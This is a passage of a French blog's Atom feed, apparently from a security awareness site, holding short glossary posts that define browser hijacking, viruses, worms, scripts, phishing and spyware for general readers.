name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/QblA43AgDWs&amp;hl=fr&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;strong&gt;Partie 2&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;br /&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/c0gORxPTup4&amp;amp;hl=fr&amp;amp;fs=1&amp;amp;rel=0&amp;amp;color1=0x006699&amp;amp;color2=0x54abd6"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/c0gORxPTup4&amp;hl=fr&amp;fs=1&amp;rel=0&amp;color1=0x006699&amp;color2=0x54abd6" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-494265416973764074?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/494265416973764074/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/msn-dangers-en-video.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/494265416973764074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/494265416973764074'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/msn-dangers-en-video.html' title='MSN Dangers en Vidéo'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4900136804658279128</id><published>2008-11-11T06:55:00.000-08:00</published><updated>2009-03-06T07:42:44.615-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hijack'/><title type='text'>Hijack</title><content type='html'>&lt;span style="font-size:180%;color:#990000;"&gt;&lt;strong&gt;Hijack - Hijacker - Hijacking&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;Définition :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;Modification non sollicitée du comportement et/ou des réglages du navigateur de l'internaute&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000000;"&gt;&lt;span style="color:#ffffff;"&gt;Une tentation forte des webmasters (et, surtout, des e-commerçants gangsters) est de modifier les réglages de votre navigateur à votre insu. Ceci se fait par l'intermédiaire de fonctionnalités standards (outils standards) mises à disposition des webmasters, tels que les contrôles ActiveX ou les JavaScript et autres langages de script. Ces modifications peuvent êtres anodines (mais agaçantes)&lt;/span&gt; &lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;Par exemple :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Afficher un site en plein écran en masquant la quasi totalité des barres de boutons etc. ... (équivalent à l'appui par l'internaute sur la touche F11).&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Modifier votre sélection de page de démarrage : vous avez choisi, chaque fois que vous lancez votre navigateur, de démarrer sur telle page. Et bien, de temps en temps, votre préférence est modifiée et votre navigateur démarre, par exemple, sur le site d'un coutumier du fait : Microsoft !&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Modifier votre page de recherche - dito ci-dessus.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Ajouter de nouvelles entrées dans votre liste de favoris, entrées que vous n'avez jamais, vous mêmes, introduites.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Etc...&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4900136804658279128?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4900136804658279128/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/hijack.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4900136804658279128'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4900136804658279128'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/hijack.html' title='Hijack'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-9217574183445678893</id><published>2008-11-11T06:38:00.000-08:00</published><updated>2009-03-06T08:26:36.353-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Définition Virus'/><title type='text'>Définition Virus</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:180%;color:#cc0000;"&gt;Virus : définition&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;color:#666666;"&gt;&lt;strong&gt;&lt;em&gt;Qu'est-ce qu'un virus informatique ?&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Définition :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Virus :&lt;/span&gt; &lt;em&gt;Programme auto-répliquant se liant à des organismes pré-existants&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;ou&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Virus :&lt;/span&gt; &lt;em&gt;Programme auto-répliquant contenant une charge généralement, mais pas forcément, hostile, ayant la faculté de se lier à des organismes pré-existants, susceptibles d'être dupliqués, afin d'assurer sa prolifération à l'insu des utilisateurs.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Ce qui caractérise un virus est :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#663366;"&gt;sa faculté de s'exécuter (d'être un programme) et donc d'intervenir sur une machine hôte&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#663366;"&gt;sa faculté de s'exécuter sans le consentement de l'utilisateur (à son insu)&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#663366;"&gt;sa faculté de se reproduire (se dupliquer, se répliquer, proliférer dans l'organisme infecté) et son besoin d'un hôte. Il n'a pas la capacité de se propager seul en dehors de l'organisme infecté - lorsqu'il aura acquis cette faculté on l'appellera Vers (Worm). S'il n'a pas la capacité de se répliquer, ce n'est pas un virus mais un parasite.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;Qu'est-ce qu'un virus ?&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Un virus est un programme, souvent petit, certes, mais un programme, tout à fait normal, au même titre que Windows, votre tableur ou votre traitement de textes. Ce n'est que sa finalité qui diffère. Sa construction est essentiellement faite de 2 composants.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#663366;"&gt;le dispositif de réplication&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#663366;"&gt;la charge active&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000099;"&gt;C'est cette capacité à se répliquer, à se lier à du code déjà existant et à attendre d'avoir atteint un certain seuil de virulence avant de se déclencher qui a fait que l'on a appelé "virus" ces programmes malveillants. On définit donc un virus informatique comme un programme auto-répliquant ayant la faculté de lier ses répliques à des organismes pré-existants.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;Charge active :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Certains virus sont programmés pour endommager ou supprimer les programmes ou les fichiers ou pour complètement effacer (reformatage) un disque dur. D'autres sont conçus pour simplement ennuyer l'utilisateur en affichant des textes ou des vidéo ou en diffusant des messages audio... Même ces simples virus "inoffensifs" peuvent créer des problèmes pour l'utilisateur : ils utilisent des ressources comme la mémoire au détriment des applications légitimes... En sus, beaucoup de virus sont écrits par des "script kiddies", assez mauvais en programmation, et sont truffés d'erreurs qui entraînent le blocage de l'ordinateur et la perte des données.&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;strong&gt;Nota :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Les &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/vers.html" target="_blank"&gt;vers&lt;/a&gt; (Worm)&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000099;"&gt;Les vers ne se différencient des virus que par leur mode de propagation. Leur dispositif de propagation vise les systèmes de messagerie essentiellement afin de se propager de leur propre initiative par cette voie au lieu de viser les objets exécutables et d'attendre que ceux-ci soient répliqués par la volonté de l'utilisateur. Pour le reste, il s'agit de virus "normaux".&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Les macrovirus&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#000099;"&gt;Les macrovirus ne se différencient des virus que par leur langage d'écriture (les langages "macro" des applications bureautiques). Ils infestent alors les documents de type bureautique Word, Excel etc. ... Leur propagation suit celle de la réplication des documents infestés. Si un document est dupliqué et distribué à un grand nombre d'utilisateurs, le virus est répliqué dans les mêmes proportions. Si le document n'est pas dupliqué, le virus n'ira pas plus loin. Un document Word pollué distribué à tous les collaborateurs d'une entreprise compromet la totalité des documents sur la totalité des ordinateurs de l'entreprise.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-9217574183445678893?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/9217574183445678893/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/definition-virus.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/9217574183445678893'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/9217574183445678893'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/definition-virus.html' title='Définition Virus'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-7680114329078768375</id><published>2008-11-10T09:05:00.000-08:00</published><updated>2009-03-06T07:44:17.152-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Script'/><title type='text'>Script</title><content type='html'>&lt;span style="font-size:180%;color:#cc0000;"&gt;&lt;strong&gt;Script&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#666666;"&gt;Les scripts sont des programmes écrits dans un langage appelé "langage de script" tel que JavaScript. Indispensables mais trop puissants ou trop permissifs, ils permettent à quelques-uns toutes formes d'investigations ou de malveillances intrusives et / ou destructives.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Les scripts sont des programmes écrits dans un langage appelé "langage de script" tel que Javascipt&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Nota :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Les langages de script sont des langages de très haut niveau - entendez par-là qu'ils se situent tout en haut des couches d'abstractions permettant d'accéder aux ressources des couches inférieures comme le système d'exploitation Windows et les ressources matérielles - à l'inverse par exemple du langage "assembleur" qui est le langage de plus bas niveau possible et qui lui s'adresse directement au matériel.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;En gros :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#666666;"&gt;il est (relativement) facile d'écrire quelque chose dans un langage de script mais avec des limitations (volontaires ou non y compris en vitesse d'exécution et étendue des possibilités) tandis qu'il est extrêmement difficile d'écrire en assembleur mais il n'y a aucunes limites de fonctionnalités et c'est le seul moyen d'optimiser totalement la vitesse d'exécution. L'intermédiaire étant des langages comme C++ qui donne un bon code mais optimisable.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#666666;"&gt;le fonctionnement est en pelures d'oignons : le script de haut niveau fait des requêtes aux couches de l'operating system qui font des requêtes aux couches matériel qui font des requêtes au matériel et inversement, chaque couche étant constituée de deux strates, celle qui fait l'interface avec la couche de niveau supérieur - c'est la couche d'abstraction qui reçoit les requêtes et les met en forme - et celle qui fait l'interface avec les couches de niveau inférieur et passe les paramètres de la requête ou reçoit les résultats, c'est la couche physique. C'est grâce à ce genre de techniques en couches d'abstractions que le même script peut fonctionner en faisant des requêtes à Windows ou à Mac OS ou à Linux ou à Unix etc. ...&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-7680114329078768375?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/7680114329078768375/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/script.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7680114329078768375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7680114329078768375'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/script.html' title='Script'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-753111537812530071</id><published>2008-11-10T08:57:00.000-08:00</published><updated>2009-03-06T07:45:23.302-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Phishing'/><title type='text'>Phishing</title><content type='html'>&lt;span style="font-size:180%;color:#cc0000;"&gt;&lt;strong&gt;Phishing&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="font-size:130%;"&gt;La pêche à vos informations confidentielles (financières...)&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#666666;"&gt;Définition :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Le Phishing consiste, pour des escrocs, à aller à la pêche à vos informations confidentielles (financières, d'identification sur le système de votre entreprise etc. ...) en vous persuadant de les lui donner, tout simplement. Tout est dans la forme et vous allez tout leur donner, en vérifiant scrupuleusement que vous n'avez fait aucune faute de frappe, aucune erreur de mot de passe, de code confidentiel etc. ...&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;75% des titulaires de comptes sont concernés et cette escroquerie est en augmentation fulgurante&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Des organisations travaillent sur ces problèmes au nveau du protiocole&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Des alertes techniques sont lancées&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Des informations et alertes grand public sont faites&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;Des sites sont consacrés à ce type d'escroquerie&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc0000;"&gt;L'attaque est lancée par spam (appelée quelquefois "spam frauduleux" ou "scam" ou "spoof email" ou "email hoax scam" ou encore "phishing scam") et met en oeuvre une copie miroir frauduleuse et piégée d'une page réelle d'un établissement financier. La propagation des scam de phishing utilise les 2 méthodes habituelles de propagation des spam.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#666666;"&gt;&lt;strong&gt;Etymologie :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;Le Phishing tient du huax (c'est de l' "intox") et de l'ingénierie sociale. Il est généralemnt basé sur l'attaque du plus grand nombre afin de lever rapidement, dans la masse des attaqués, un lot de gogos crédules et pas informés. Le phishing va consister à les mettre en confiance.&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-753111537812530071?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/753111537812530071/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/phishing.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/753111537812530071'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/753111537812530071'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/phishing.html' title='Phishing'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-2411917273968495968</id><published>2008-11-10T08:50:00.000-08:00</published><updated>2009-03-06T07:46:21.647-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vers'/><title type='text'>Vers</title><content type='html'>&lt;span style="font-size:180%;color:#666666;"&gt;&lt;strong&gt;Ces virus que l'on appelle Worms &lt;span style="color:#cc0000;"&gt;(Vers)&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#3333ff;"&gt;Les virus de type "worm" (vers) ont résolu l'un des problèmes des virus : celui de leur propagation. Les virus "traditionnels" sont statiques dans leur mode de propagation : ils attendent sagement qu'un être humain les balade d'une machine à une autre par hôte infecté. Les vers ont résolu ce problème en ajoutant un module d'auto-propagation à leur structure et ils s'envoient eux-mêmes, activement, vers d'autres machines en utilisant un système de transport.&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-2411917273968495968?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/2411917273968495968/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/vers.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2411917273968495968'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2411917273968495968'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/vers.html' title='Vers'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4853151344645902116</id><published>2008-11-10T08:29:00.000-08:00</published><updated>2009-03-06T07:47:24.260-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Spyware'/><title type='text'>Spyware</title><content type='html'>&lt;span style="font-size:180%;color:#cc0000;"&gt;&lt;strong&gt;Spyware&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#666666;"&gt;Définition&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Est un " Spyware " tout &lt;span style="color:#000099;"&gt;code (1)&lt;/span&gt; introduit sur un dispositif pour collecter des informations à l'insu ou sans la permission explicite et éclairée de l'utilisateur et qui emploie tout &lt;span style="color:#000099;"&gt;moyen (2)&lt;/span&gt; pour délivrer ces &lt;span style="color:#000099;"&gt;informations (3).&lt;/span&gt; &lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;(1) Code :&lt;/span&gt; &lt;span style="color:#3366ff;"&gt;&lt;em&gt;Programme, sous-programme, composant, routine mais aussi micro-programme (bios, firmware etc. ...) et tout dispositif ayant ce comportement ou concourant à ce comportement.&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;(2) Moyen :&lt;/span&gt; &lt;span style="color:#3366ff;"&gt;&lt;em&gt;Une connexion réseau mais aussi un support quelconque y compris la conservation de ces informations sur le dispositif de l'utilisateur permettant, au final, leur mise à disposition au profit d'un tiers.&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;(3) Informations :&lt;/span&gt; &lt;em&gt;&lt;span style="color:#3366ff;"&gt;Peu importe que les informations soient des données personnelles ou non, soient nominatives ou non, et qu'il y ait ou non un rapprochement entre ces informations et l'identification de l'utilisateur, personne physique ou morale.&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#666666;"&gt;Etymologie&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Spyware et un acronyme anglais venant de "Spy" (espion / espionne en anglais) et "ware" qui désigne une classe de logiciels (freeware, shareware, payware etc. ...). La traduction française en Logiciel Espion a donné Espiogiciel quelquefois mal orthographié en Espiongiciel.&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4853151344645902116?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4853151344645902116/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/spyware.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4853151344645902116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4853151344645902116'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/spyware.html' title='Spyware'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-1786862672788918741</id><published>2008-11-10T08:17:00.000-08:00</published><updated>2009-03-06T07:48:27.885-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ToolBar'/><title type='text'>Toolbar</title><content type='html'>&lt;span 